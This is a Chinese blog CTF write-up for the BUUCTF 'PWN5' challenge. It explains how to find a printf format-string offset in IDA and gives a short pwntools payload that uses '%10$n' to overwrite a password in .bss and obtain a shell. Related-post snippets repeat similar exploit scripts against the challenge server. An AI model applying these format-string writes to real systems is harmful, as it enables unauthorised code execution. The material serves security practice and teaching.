PWN——[第五空间2019 决赛]PWN5

最新推荐文章于 2024-07-05 00:13:46 发布
最新推荐文章于 2024-07-05 00:13:46 发布
阅读量488 收藏
点赞数 1
分类专栏: pwn 文章标签: 青少年编程
--simon
本文链接:https://blog.csdn.net/qq_38177830/article/details/127857270
版权

前言

网传题解是通过printf的%08x,依次dump出栈中内容,再与传入内容进行比较,以此确定传入内容在栈中的位置。

实际上,IDA是个十分强大的工具,可以通过IDA静态分析出位置

实战

在这里插入图片描述

buf长100字节,位于esp+20

双击buf进入栈视图

在这里插入图片描述

发现写入的数据处于栈的第10位

再去查看要写入的数据

双击进入bss段,发现要写入的数据是DWORD,也就是4字节

四字节正好使用%n (hn是写入两字节,hhn是写入一字节,lln是写入八字节)

在这里插入图片描述

再根据%$n特性,即可构造出payload

在这里插入图片描述

bss=0x0804c044
payload=p32(bss)+b'%10$n'
p.sendline(payload)
p.sendline(b'4') #因为p32是四个字符

注意

%5$n=%x%x%x%x%n

后续

还在别人的博客发现了新的方法,等下次有时间更新

有头发的琦玉
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[第五空间2019 决赛]PWN5
m0_52231248的博客
11-02 108
[第五空间2019 决赛]PWN5 题目Ubuntu16,libc2.23 Checksec检查发现开启了canary和nx 进入main函数发现gets函数存在格式化字符串漏洞 并且程序会检查我们输入的password是否等于unk_804C044这个随机数,成功会直接给我们调用system(“/bin/sh”),因此我们检查unk_804C044位置发现位于bss段 接下来只要确认我们输入的数据到unk_804C044的偏移即可修改unk_804C044。 可以通过.%p或者gd
buuctf——[第五空间2019 决赛]PWN5 1
qq_41560595的博客
03-17 4455
查看文件权限 设置了canary,无法栈溢出。 F5查看源程序 源程序大意是把随机数放入到bss段的0x804c044处,用户输入用户名和密码,如果密码和随机数相等,则拿到权限。 解题思路 看到了printf,又加了canary权限,可以想到考查格式化字符串漏洞。可以更改0x804c044处的值,所以要精心构造一个合适的格式化字符串。构造的方法很多。 在用户输入用户名处,先输入一个AAAA,试探会写在栈的哪个位置。 “AAAA”写在了第10个位子。构造: bss=0x804c044 payload=b
【BUUCTF-PWN】7-[第五空间2019 决赛]PWN5
最新发布
燕麦葡萄干的博客
07-05 483
因此将正常的printf语句转为无参数的printf,即将参数放到格式化字符串前面构造payload,从而利用%n将前面的字符数写入到指定地址中,passwd的每个字节即写入地址中的值是p32(0x804c047)+p32(0x804c046)+p32(0x804c045)+p32(0x804c044)的长度,也就是4x4=16,二进制为0x10,所以passwd就是4个0x10拼接起来后的计算结果str(0x10101010)=269488144。32位小端排序,有栈溢出保护。存在格式化字符串漏洞。
pwn】[第五空间2019 决赛]PWN5
ethan18的博客
07-13 265
函数的逻辑(就是上面那个伪代码),可以看出,主要是需要让我们的passwd输入值和从文件中输入的值保持相同,但是很明显我们根本就不知道这个。可以数出,0x41414141是格式化字符串的第10个参数,所以我们构造的时候就需要从。这是Buuctf的一道题,是我实战遇到的第一道格式字符串漏洞,在此记录。对于格式化字符串漏洞,我们首先要确定输入点是栈中的第几个参数。函数里面直接输入了地址,表明是有格式字符串漏洞的。,我们一个字节一个字节的存入,所以不能是直接用。,将输出的字符串的数量覆盖进所指向的位置。
【BUU】[第五空间2019 决赛]PWN5
bzduanlei的博客
07-31 432
一、前置知识 1、%n,不输出字符,但是把已经成功输出的字符个数写入对应的整型指针参数所指的变量。 2、如何确定存储格式化字符串的地址是 printf 将要输出的第几个参数? ​ 运行程序后,在格式化字符串漏洞的位置输入AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p,看AAAA的数值对应在格式化字符串的第几个参数。 可以看到,AAAA对应的数值0x41414141在格式化字符串的第10个参数。 二、解题思路 0x01 分析文件 0x02 拖入IDA 3
BUUCTF-Pwn-[第五空间2019 决赛]PWN5
餐桌上的猫
02-15 371
题目截图 检查文件信息 这是一个32位的程序,开启了NX和Canary 用IDA打开查看找到来能getshell的代码 反汇编查看主函数功能,程序将我们输入的passwd与存放在804c044地址的数进行比较,正确就可以getshell了,红框中存在格式化字符串漏洞,我们可以利用该漏洞重写804c044地址处的数据来getshell 测试我们输入的内容在栈中的位置,是第10个 exp from pwn import* r=remote('node4.buuoj.cn',28850) addr=
2020第五空间智能安全大赛PWN——twice
baidu_36110484的博客
06-30 815
0x00背景 这次比赛中的一道pwn题,主要考察了栈迁移和泄露canary。之前没有接触过栈迁移,所以当时没有做出来(好多人都做出来了,捂脸)。 没办法,菜鸡只能赛后复盘。注:虚拟机环境使用的动态库为kali的libc-2.30.so 0x01源码分析 主要代码逻辑如下,main函数之后可以进行两次输入,然后将输入的字符串打印出来。第一次输入可以溢出一个字节,用于泄露canary和栈地址(用于之后的栈迁移),第二次输入可以溢出到返回地址,修改程序流程完成栈迁移,从而执行ROP链。 0x02 exp构造 需
[CTF][第五空间2019 决赛]PWN5 1
凉水的博客
12-09 1135
解题思路 反编译后的源码: srand(__seed); // 生成随机数 iVar1 = open("/dev/urandom",0); read(iVar1,&DAT_0804c044,4); printf("your name:"); // 读取输入 read(0,local_78,99); printf("Hello,"); // 打印输入 printf(local_78); printf("your passwd:"); read(0,loc
BUUCTF - [第五空间2019 决赛]PWN5
Sakura给爷pwn全场
02-03 255
from pwn import * context(arch='i386',os='linux',log_level='debug',binary='pwn5') io=remote('node3.buuoj.cn',28518) elf=ELF('./pwn5') io.recvuntil('your name:') unk_addr=0x0804C044 payload=p32(unk_addr)+'%10$n' io.sendline(payload) io.recvuntil('your passw
buuctf pwn 第五空间决赛pwn5
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

有头发的琦玉

打点钱,我会再努力的

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值